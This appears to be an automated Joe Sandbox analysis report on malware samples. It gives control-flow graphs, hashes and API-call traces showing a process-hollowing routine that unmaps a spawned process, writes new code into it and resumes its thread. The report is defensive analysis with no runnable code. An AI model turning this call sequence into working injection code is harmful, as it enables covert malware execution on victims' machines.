                                                                                                control_flow_graph 450 2f21964-2f2197d 451 2f2197f-2f21981 450->451 452 2f21983 451->452 453 2f21988-2f21994 CreateToolhelp32Snapshot 451->453 452->453 454 2f21996-2f2199c 453->454 455 2f219a4-2f219b1 Module32First 453->455 454->455 460 2f2199e-2f219a2 454->460 456 2f219b3-2f219b4 call 2f21623 455->456 457 2f219ba-2f219c2 455->457 461 2f219b9 456->461 460->451 460->455 461->457
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F2198C
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 02F219AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F1B000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_2f1b000_rujtcgu.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: 727ca69126069fef67eb670d773b38c93715bbfd73def66e448c72aaccf3ae46
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: F6F0F6319003216FD7203BF49C8CBAF76E9BF4A6A5F140228E74AE20C1DB70E80D4A65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 481 2ee0e0f-2ee0e24 SetErrorMode * 2 482 2ee0e2b-2ee0e2c 481->482 483 2ee0e26 481->483 483->482
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02EE0223,?,?), ref: 02EE0E19
                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02EE0223,?,?), ref: 02EE0E1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_2ee0000_rujtcgu.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction ID: 179eb12c8860f6d17e51d0351f74b3a90e9c5c64cc944f07b49318d719482cfa
                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction Fuzzy Hash: 08D0123114512877DB003A94DC09BCD7B1CDF05B66F008021FB0DE9180C7B0954046E5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 484 4019b2-4019bb 485 4019c3-401a19 call 40125c Sleep call 4014de 484->485 486 4019cd 484->486 498 401a28-401a77 call 40125c 485->498 499 401a1b-401a23 call 4015d5 485->499 486->485 499->498
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                • Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
                                                                                                • Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                • Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 513 4019cc-401a19 call 40125c Sleep call 4014de 527 401a28-401a77 call 40125c 513->527 528 401a1b-401a23 call 4015d5 513->528 528->527
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                • Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
                                                                                                • Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                • Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 542 4019be-401a19 call 40125c Sleep call 4014de 555 401a28-401a77 call 40125c 542->555 556 401a1b-401a23 call 4015d5 542->556 556->555
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                • Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
                                                                                                • Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                • Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                • Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
                                                                                                • Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                • Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                • Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
                                                                                                • Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                • Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02F21674
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F1B000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_2f1b000_rujtcgu.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: 33f036d9e09128a46f857195bb79e8a438c6aa6c18fdaf4b86035e94839ceecf
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: 93113F79A00208EFDB01DF98C985E99BFF5AF08350F058094FA489B362D371EA50DF84

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.2%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:28.9%
                                                                                                Total number of Nodes:38
                                                                                                Total number of Limit Nodes:8
                                                                                                execution_graph 30862 4a10000 30865 4a10630 30862->30865 30864 4a10005 30866 4a1064c 30865->30866 30868 4a11577 30866->30868 30871 4a105b0 30868->30871 30875 4a105dc 30871->30875 30872 4a105e2 GetFileAttributesA 30872->30875 30873 4a1061e 30875->30872 30875->30873 30876 4a10420 30875->30876 30877 4a104f3 30876->30877 30878 4a104fa 30877->30878 30879 4a104ff CreateWindowExA 30877->30879 30878->30875 30879->30878 30880 4a10540 PostMessageA 30879->30880 30881 4a1055f 30880->30881 30881->30878 30883 4a10110 VirtualAlloc GetModuleFileNameA 30881->30883 30884 4a10414 30883->30884 30885 4a1017d CreateProcessA 30883->30885 30884->30881 30885->30884 30887 4a1025f VirtualFree VirtualAlloc Wow64GetThreadContext 30885->30887 30887->30884 30888 4a102a9 ReadProcessMemory 30887->30888 30889 4a102e5 VirtualAllocEx NtWriteVirtualMemory 30888->30889 30890 4a102d5 NtUnmapViewOfSection 30888->30890 30891 4a1033b 30889->30891 30890->30889 30892 4a10350 NtWriteVirtualMemory 30891->30892 30893 4a1039d WriteProcessMemory Wow64SetThreadContext ResumeThread 30891->30893 30892->30891 30894 4a103fb ExitProcess 30893->30894 30896 4976026 30897 4976035 30896->30897 30900 49767c6 30897->30900 30906 49767e1 30900->30906 30901 49767ea CreateToolhelp32Snapshot 30902 4976806 Module32First 30901->30902 30901->30906 30903 4976815 30902->30903 30905 497603e 30902->30905 30907 4976485 30903->30907 30906->30901 30906->30902 30908 49764b0 30907->30908 30909 49764c1 VirtualAlloc 30908->30909 30910 49764f9 30908->30910 30909->30910 30910->30910

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 04A10156
                                                                                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 04A1016C
                                                                                                • CreateProcessA.KERNELBASE(?,00000000), ref: 04A10255
                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04A10270
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 04A10283
                                                                                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 04A1029F
                                                                                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A102C8
                                                                                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 04A102E3
                                                                                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 04A10304
                                                                                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 04A1032A
                                                                                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 04A10399
                                                                                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A103BF
                                                                                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 04A103E1
                                                                                                • ResumeThread.KERNELBASE(00000000), ref: 04A103ED
                                                                                                • ExitProcess.KERNEL32(00000000), ref: 04A10412
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                • String ID:
                                                                                                • API String ID: 93872480-0
                                                                                                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                • Instruction ID: b60735fe45fa30e49e72f8f53c53d6a706bbabc1bab4d82a9814d103798eb68a
                                                                                                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                • Instruction Fuzzy Hash: 3EB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE81CF94

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 15 4a10420-4a104f8 17 4a104fa 15->17 18 4a104ff-4a1053c CreateWindowExA 15->18 19 4a105aa-4a105ad 17->19 20 4a10540-4a10558 PostMessageA 18->20 21 4a1053e 18->21 22 4a1055f-4a10563 20->22 21->19 22->19 23 4a10565-4a10579 22->23 23->19 25 4a1057b-4a10582 23->25 26 4a10584-4a10588 25->26 27 4a105a8 25->27 26->27 28 4a1058a-4a10591 26->28 27->22 28->27 29 4a10593-4a10597 call 4a10110 28->29 31 4a1059c-4a105a5 29->31 31->27
                                                                                                APIs
                                                                                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 04A10533
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateWindow
                                                                                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                • API String ID: 716092398-2341455598
                                                                                                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                • Instruction ID: b84508933c54b72f4b401acc7ee7505e276e80a7699b4a85772567c97487eb42
                                                                                                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                • Instruction Fuzzy Hash: F9513A70D08388DEEB11CBE8C849BDDBFB2AF15708F184058D5457F296C3BA6658CB62

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 32 4a105b0-4a105d5 33 4a105dc-4a105e0 32->33 34 4a105e2-4a105f5 GetFileAttributesA 33->34 35 4a1061e-4a10621 33->35 36 4a10613-4a1061c 34->36 37 4a105f7-4a105fe 34->37 36->33 37->36 38 4a10600-4a1060b call 4a10420 37->38 40 4a10610 38->40 40->36
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 04A105EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID: apfHQ$o
                                                                                                • API String ID: 3188754299-2999369273
                                                                                                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                • Instruction ID: 142e5624620bb18f7e4c5228d1d34695ed88cc230a1331ffdccf45d857c94169
                                                                                                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                • Instruction Fuzzy Hash: A7012170C0824CEEDF10DB98C5583AEBFB5AF51308F1480D9C4193B252D7B69B98CBA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 41 49767c6-49767df 42 49767e1-49767e3 41->42 43 49767e5 42->43 44 49767ea-49767f6 CreateToolhelp32Snapshot 42->44 43->44 45 4976806-4976813 Module32First 44->45 46 49767f8-49767fe 44->46 47 4976815-4976816 call 4976485 45->47 48 497681c-4976824 45->48 46->45 52 4976800-4976804 46->52 53 497681b 47->53 52->42 52->45 53->48
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 049767EE
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 0497680E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Offset: 04976000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4976000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: 880c1bbab896d72ac9a5da12e305c2ce2b2ecccb300b69376139a30897a46cc1
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: ACF06231200B116BD7203BB5A88DBAA76ECAF89775F100538E642914C0DA74FC454B61

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 54 4976485-49764bf call 4976798 57 49764c1-49764f4 VirtualAlloc call 4976512 54->57 58 497650d 54->58 60 49764f9-497650b 57->60 58->58 60->58
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 049764D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Offset: 04976000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4976000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: 01e5ca60748758b7960db77ee29c3ac651eba713f151f7b86b708d5f1b3d9faa
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: 6D113979A00208EFDB01DF98C985E99BBF5AF08350F0580A4F9489B361D371EA90EF80

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 300 4a2f030-4a2f078 call 4a40160 call 4a34914 call 4a1d040 308 4a2f080-4a2f086 300->308 309 4a2f090-4a2f0c2 call 4a3bdc0 call 4a1cea0 308->309 314 4a2f0c4-4a2f0c9 309->314 315 4a2f0ce-4a2f112 309->315 316 4a2f3bf-4a2f3e0 call 4a34690 314->316 319 4a2f114-4a2f116 315->319 320 4a2f118-4a2f11d 315->320 324 4a2f3e2-4a2f3e6 316->324 325 4a2f42d-4a2f46c 316->325 322 4a2f12f-4a2f158 call 4a26480 call 4a325a2 319->322 323 4a2f120-4a2f129 320->323 341 4a2f222-4a2f285 call 4a26480 call 4a24990 call 4a232a0 call 4a26370 322->341 342 4a2f15e-4a2f197 call 4a25030 call 4a1e6e0 322->342 323->323 327 4a2f12b-4a2f12d 323->327 328 4a2f7ca-4a2f7da call 4a224b0 324->328 329 4a2f3ec-4a2f401 324->329 358 4a2f46e 325->358 359 4a2f48f-4a2f4b2 325->359 327->322 338 4a2f7dc-4a2f7df 328->338 339 4a2f7ed-4a2f822 call 4a1f8f0 328->339 329->309 336 4a2f407-4a2f428 329->336 336->309 338->308 350 4a2f826-4a2f82c 339->350 398 4a2f293-4a2f2b7 341->398 399 4a2f287-4a2f290 call 4a32f27 341->399 368 4a2f199-4a2f19e 342->368 369 4a2f20f-4a2f214 342->369 354 4a2f832-4a2f834 350->354 355 4a2f82e-4a2f830 350->355 362 4a2f837-4a2f83c 354->362 361 4a2f840-4a2f84f call 4a24840 355->361 365 4a2f470-4a2f478 358->365 366 4a2f4b4-4a2f4b6 359->366 367 4a2f4b8-4a2f4bf 359->367 361->350 382 4a2f851-4a2f883 call 4a1f8f0 361->382 362->362 370 4a2f83e 362->370 373 4a2f47a-4a2f487 365->373 374 4a2f48b 365->374 376 4a2f4cb-4a2f4ef call 4a26070 call 4a232a0 366->376 377 4a2f4c2-4a2f4c7 367->377 378 4a2f1a0-4a2f1a9 call 4a32f27 368->378 379 4a2f1ac-4a2f1c7 368->379 369->341 375 4a2f216-4a2f21f call 4a32f27 369->375 370->361 373->365 401 4a2f489 373->401 374->359 375->341 407 4a2f4f3-4a2f506 376->407 408 4a2f4f1 376->408 377->377 384 4a2f4c9 377->384 378->379 387 4a2f1e2-4a2f1e8 379->387 388 4a2f1c9-4a2f1cd 379->388 406 4a2f887-4a2f88d 382->406 384->376 389 4a2f1ee-4a2f20c 387->389 388->389 390 4a2f1cf-4a2f1e0 call 4a30f40 388->390 389->369 390->389 415 4a2f2e3-4a2f31a 398->415 416 4a2f2b9-4a2f2c0 398->416 399->398 401->359 410 4a2f893-4a2f895 406->410 411 4a2f88f-4a2f891 406->411 422 4a2f514-4a2f584 call 4a31602 call 4a3bdc0 call 4a34690 407->422 423 4a2f508-4a2f511 call 4a32f27 407->423 408->407 414 4a2f898-4a2f89d 410->414 413 4a2f8a1-4a2f8b0 call 4a24840 411->413 413->406 429 4a2f8b2-4a2f8ec call 4a24990 call 4a232a0 413->429 414->414 418 4a2f89f 414->418 434 4a2f38c-4a2f3a8 415->434 435 4a2f31c-4a2f334 415->435 416->415 419 4a2f2c2-4a2f2ce 416->419 418->413 424 4a2f2d0-4a2f2d5 419->424 425 4a2f2d7 419->425 469 4a2f586-4a2f58a 422->469 470 4a2f5dd-4a2f637 422->470 423->422 428 4a2f2dc 424->428 425->428 428->415 444 4a2f8f0-4a2f908 429->444 445 4a2f8ee 429->445 451 4a2f3b6-4a2f3b9 434->451 452 4a2f3aa-4a2f3b3 call 4a32f27 434->452 435->434 446 4a2f336-4a2f362 call 4a32a56 435->446 454 4a2f916-4a2f953 call 4a24990 call 4a232a0 444->454 455 4a2f90a-4a2f913 call 4a32f27 444->455 445->444 446->434 466 4a2f364-4a2f389 call 4a334a2 call 4a343d8 446->466 451->316 452->451 474 4a2f957-4a2f966 454->474 475 4a2f955 454->475 455->454 466->434 469->328 473 4a2f590-4a2f5b1 469->473 503 4a2f639 470->503 504 4a2f65f-4a2f67d 470->504 473->309 486 4a2f5b7-4a2f5d8 473->486 483 4a2f974-4a2f980 474->483 484 4a2f968-4a2f971 call 4a32f27 474->484 475->474 488 4a2f982-4a2f98b call 4a32f27 483->488 489 4a2f98e-4a2f9a8 483->489 484->483 486->308 488->489 493 4a2f9b6 489->493 494 4a2f9aa-4a2f9b3 call 4a32f27 489->494 498 4a2f9ba-4a2f9d0 493->498 494->493 507 4a2f640-4a2f648 503->507 505 4a2f683-4a2f68d 504->505 506 4a2f67f-4a2f681 504->506 509 4a2f690-4a2f695 505->509 508 4a2f699-4a2f6bb call 4a26070 call 4a232a0 506->508 510 4a2f64a-4a2f657 507->510 511 4a2f65b 507->511 519 4a2f6bf-4a2f6d5 508->519 520 4a2f6bd 508->520 509->509 512 4a2f697 509->512 510->507 517 4a2f659 510->517 511->504 512->508 517->504 522 4a2f6e3-4a2f74b call 4a31602 call 4a3bdc0 519->522 523 4a2f6d7-4a2f6e0 call 4a32f27 519->523 520->519 534 4a2f75c-4a2f761 522->534 535 4a2f74d-4a2f756 522->535 523->522 536 4a2f763-4a2f784 534->536 537 4a2f7b0-4a2f7b2 534->537 535->534 541 4a2f7e4-4a2f7e8 535->541 536->309 546 4a2f78a-4a2f7ab 536->546 539 4a2f7b4-4a2f7ba call 4a3158d 537->539 540 4a2f7bd-4a2f7bf 537->540 539->540 540->328 544 4a2f7c1-4a2f7c7 call 4a3158d 540->544 541->498 544->328 546->308
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$_free_malloc_strstr$_wcsstr
                                                                                                • String ID: "
                                                                                                • API String ID: 430003804-123907689
                                                                                                • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                • Instruction ID: 1f3e6c04be93f6e85f7d485ba56301c7085ead87f8a905a06af2f893f27a34f7
                                                                                                • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                • Instruction Fuzzy Hash: A342C271508350AFE720DF28DD48B9B7BF8BF85308F04092DF58997191EB75A609DBA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                • Instruction ID: a22c8e019b489050892f3f68e2622ea5122ca3d19428c53ba2674deb9b764b7f
                                                                                                • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                • Instruction Fuzzy Hash: 3E528171D04228DFEF10DFA8CA84BDEBBB5BF04308F108569E519A7290E735BA44DB91
                                                                                                APIs
                                                                                                • _wcsstr.LIBCMT ref: 04A1E72D
                                                                                                • _wcsstr.LIBCMT ref: 04A1E756
                                                                                                • _memset.LIBCMT ref: 04A1E784
                                                                                                  • Part of subcall function 04A5FC0C: std::exception::exception.LIBCMT ref: 04A5FC1F
                                                                                                  • Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FC34
                                                                                                  • Part of subcall function 04A5FC0C: std::exception::exception.LIBCMT ref: 04A5FC4D
                                                                                                  • Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FC62
